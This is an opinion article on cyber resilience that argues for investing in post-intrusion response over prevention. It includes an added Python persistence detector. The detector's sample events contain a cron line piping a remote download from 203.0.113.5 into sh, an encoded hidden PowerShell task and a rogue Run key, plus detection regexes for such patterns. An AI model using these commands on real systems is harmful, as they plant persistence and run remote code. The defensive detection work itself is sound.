Are cyber leaders focusing on the wrong things?

March 6, 2024

A pattern has emerged that is putting organizations at immense risk: cyber leaders are placing too much emphasis on before-the-incident preparation, and not enough on their teams’ after-incident response.

On the heels of the recent MGM Resorts cyberattack, large organizations have been reminded just how devastating a breach can be for operations, reputation, and the bottom line. Ransomware continues to run rampant, and the cost of such attacks is reported to have doubled over the past two years. Cyber attacks are no longer a matter of "if" but a matter of "when."

Prevention is overly prioritized, putting organizations at risk

The most recent proof point of this pattern comes from a recent study on cyber resilience, which found that the majority of cybersecurity effort, mapped against the MITRE ATT&CK framework, lands on the earliest tactics of the attack lifecycle (reconnaissance, resource development, and initial access). This allocation of resources serves organizations poorly: the sophistication of the skills attackers use grows as an intrusion progresses, and the skills defenders need to detect and stop activity in the later tactics (persistence, privilege escalation, lateral movement, exfiltration, and impact) are correspondingly more complex.

Across industries, cybersecurity leaders are deploying measures like awareness training and dedicated task forces to help their organizations prevent attacks, but leaders should not rely on technology alone to detect and stop threats. Rather than aiming to stop every threat outright, leaders should prioritize building cyber confidence and resilience across the entire workforce.

In an era when many security leaders spend too much time, money, and energy on prevention alone, strategy must shift toward investment that empowers teams to respond faster and more confidently to emerging threats.

Cyber preparedness and resilience should be the focus

Cyber preparedness has two meanings: preparing to prevent attacks and preparing to handle them. As noted above, organizations that focus their preventative effort on technology and early-stage training miss a major opportunity to improve their security posture by neglecting the "prepare to handle" aspect.

The harsh truth of the cybersecurity world is that no matter what preventative measures we employ, attackers keep the initiative: they choose the timing and the technique, and they need only one success. We can't confidently predict an attacker's next move, but we can control how quickly we detect, react, and contain an incident, and that speed is what matters. It takes work.

Because experiencing a breach is more or less inevitable, organizations must put in place training and resources that strengthen the cyber resilience of the workforce before, during, and especially after an incident. For instance, in MITRE ATT&CK terms, defenders' ability to spot an attacker's efforts to establish Persistence (tactic TA0003) after initial access, such as a newly created scheduled task, a registry Run key, or a cron entry, is critical to building resilience and lowering attackers' success rates.
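To make "detecting attempts to establish persistence" concrete, here is a small Python detector run over a handful of constructed endpoint events. This is example code written for this edit, not Immersive Labs' tooling or anything from the original article. The event shape, field names, heuristics, allowlist, and sample events are all assumptions; the ATT&CK technique IDs it emits (T1053.005 Scheduled Task, T1547.001 Registry Run Keys / Startup Folder, T1053.003 Cron) are real.

```python
"""Added example: flag persistence-establishing host events and map them to
MITRE ATT&CK technique IDs. Illustrative code written for this edit, not from
the article or from Immersive Labs. The event shape, field names, allowlist,
heuristics, and sample events are assumptions; the ATT&CK IDs are real."""
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class Alert:
    host: str
    technique: str   # ATT&CK technique ID
    name: str        # ATT&CK technique name
    evidence: str    # the field values that triggered the rule


# Heuristics (assumptions; tune to your estate). They are starting points, not truth.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public)\\", re.I)
SUSPICIOUS_CMD = re.compile(
    r"powershell(\.exe)?\s.*(-enc\b|-e\s|-w\s+hidden|-nop\b)"
    r"|\b(mshta|rundll32|regsvr32|wscript|cscript|certutil)\b", re.I)
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba)?sh\b|\bbase64\s+(-d|--decode)\b", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\(Run|RunOnce)\\", re.I)
# Assumption: tasks under the vendor-owned \Microsoft\Windows\ folder are expected noise.
TASK_ALLOWLIST = ("\\Microsoft\\Windows\\",)
CRON_PATHS = ("/etc/cron", "/etc/crontab", "/var/spool/cron")

# Constructed sample events (not real telemetry); the shape is an assumption.
SAMPLE_EVENTS = [
    # benign: built-in Windows maintenance task (allowlisted)
    {"host": "ws-0412", "source": "windows", "event_id": 4698,
     "task_name": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag", "user": "SYSTEM",
     "command": "%windir%\\system32\\defrag.exe -c -h -o -$"},
    # suspicious: user-created task running hidden, encoded PowerShell
    {"host": "ws-0412", "source": "windows", "event_id": 4698,
     "task_name": "\\Updater", "user": "jdoe",
     "command": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    # suspicious: Run key pointing at a binary dropped in the user's profile
    {"host": "ws-0412", "source": "sysmon", "event_id": 13,
     "target_object": "HKU\\S-1-5-21-1004336348-1177238915-682003330-1001"
                      "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svchost",
     "details": "C:\\Users\\jdoe\\AppData\\Roaming\\svchost.exe"},
    # suspicious: cron entry that downloads and pipes to a shell every minute
    {"host": "web-07", "source": "linux", "event_id": "file_write",
     "path": "/etc/cron.d/sync",
     "details": "* * * * * root curl -s http://203.0.113.5/x | sh"},
    # benign: certificate renewal cron
    {"host": "web-07", "source": "linux", "event_id": "file_write",
     "path": "/etc/cron.d/certbot", "details": "0 */12 * * * root certbot -q renew"},
]


def check_scheduled_task(ev: dict) -> Optional[Alert]:
    """Windows Security 4698 (scheduled task created) with a suspicious action."""
    if ev.get("source") != "windows" or ev.get("event_id") != 4698:
        return None
    task, cmd = ev.get("task_name", ""), ev.get("command", "")
    if task.startswith(TASK_ALLOWLIST):
        return None
    if SUSPICIOUS_CMD.search(cmd) or USER_WRITABLE.search(cmd):
        return Alert(ev["host"], "T1053.005", "Scheduled Task", f"{task} -> {cmd}")
    return None


def check_run_key(ev: dict) -> Optional[Alert]:
    """Sysmon 13 (registry value set) on a Run/RunOnce key pointing somewhere odd."""
    if ev.get("source") != "sysmon" or ev.get("event_id") != 13:
        return None
    key, value = ev.get("target_object", ""), ev.get("details", "")
    if RUN_KEY.search(key) and (USER_WRITABLE.search(value) or SUSPICIOUS_CMD.search(value)):
        return Alert(ev["host"], "T1547.001", "Registry Run Keys / Startup Folder", f"{key} = {value}")
    return None


def check_cron(ev: dict) -> Optional[Alert]:
    """Write to a cron location whose content downloads-and-executes or decodes a payload."""
    if ev.get("source") != "linux" or ev.get("event_id") != "file_write":
        return None
    path, content = ev.get("path", ""), ev.get("details", "")
    if path.startswith(CRON_PATHS) and DOWNLOAD_EXEC.search(content):
        return Alert(ev["host"], "T1053.003", "Cron", f"{path}: {content}")
    return None


CHECKS = (check_scheduled_task, check_run_key, check_cron)


def detect(events) -> List[Alert]:
    """Run every persistence check over every event; alerts come back in event order."""
    alerts = []
    for ev in events:
        for check in CHECKS:
            hit = check(ev)
            if hit is not None:
                alerts.append(hit)
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a.technique}] {a.name} on {a.host}: {a.evidence}")
```

Run against the constructed events, the detector raises three alerts (the encoded-PowerShell task, the Run key in the user's profile, and the curl-pipe-sh cron) and stays quiet on the two benign entries. The allowlist and the "user-writable path" test are what keep it from drowning analysts in built-in tasks and legitimate installers; the skill the article is arguing for is exactly this kind of judgement about what is normal in an environment once an attacker is already inside.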

The stronger the cyber resilience of the workforce, the better suited they are to prepare for – and respond to – persistent cyber threats. 

How organizations can implement this approach

Like any skill, inside or outside the workplace, cyber capability must be exercised continuously against realistic and emerging threat scenarios. Attackers move quickly, so upskilling must keep pace as closely as possible. Such training can take many forms, including gamified exercises, and should be engaging, timely, and consistent. One-off "fire drill" skilling events are largely ineffective and should be avoided.

As part of this training, leaders should assess and identify the skills gaps in their teams and adopt the appropriate tools to close them. There are plenty of good technological tools for detecting and mitigating threats, but the human element remains mission-critical.

Additionally, cyber resilience must become a board- and C-level priority. As noted above, breaches are incredibly costly; recognizing that and integrating preparedness into the highest levels of decision-making across the organization will materially reduce that risk, even if it cannot eliminate it.

Making resilience a priority at that level ultimately builds a cybersecurity culture in which all employees understand and prioritize security, promote best practices, and share responsibility for protecting people and assets.

Prevention isn't futile, but on its own it is not a complete strategy for protecting data. Organizations must build cyber resilience through thoughtful, engaging exercises that strengthen the workforce's ability to handle an attack at any point in the threat cycle, not just at the beginning, so that their capabilities cover the full breadth of the MITRE ATT&CK framework.


Author Bio: Max Vetter, VP of Cyber for Immersive Labs

Max leads a team of cyber experts at Immersive Labs, helping customers stay ahead of threats and be resilient against cyber attacks. Max spent seven years with London's Metropolitan Police Service as a police officer, intelligence analyst, and covert internet investigator, including time in the money laundering unit at Scotland Yard. He also worked as Assistant Director of the ICC Commercial Crime Services, investigating commercial crime, fraud, and serious organised crime groups.

Before joining Immersive Labs, Max spent three years training the private sector and government agencies, including the UK's GCHQ and its cyber summer school, in ethical hacking and open source intelligence, and was the subject matter expert in darknets and cryptocurrencies.

About the Author

Max Vetter | Chief Cyber Officer at Immersive Labs

Max Vetter currently serves as Chief Cyber Officer at Immersive Labs. Before joining Immersive Labs, Max spent seven years working with the Metropolitan Police Service. He worked as a police officer, intelligence analyst and covert internet investigator, while also spending time in Scotland Yard's money laundering unit. Max also worked with the Commercial Crime Services and Federation Against Copyright Theft, investigating commercial crime, fraud and serious organized crime groups. After leaving the police force, Max trained the private sector and government agencies in ethical hacking and open-source intelligence, specializing in darknets and cryptocurrencies.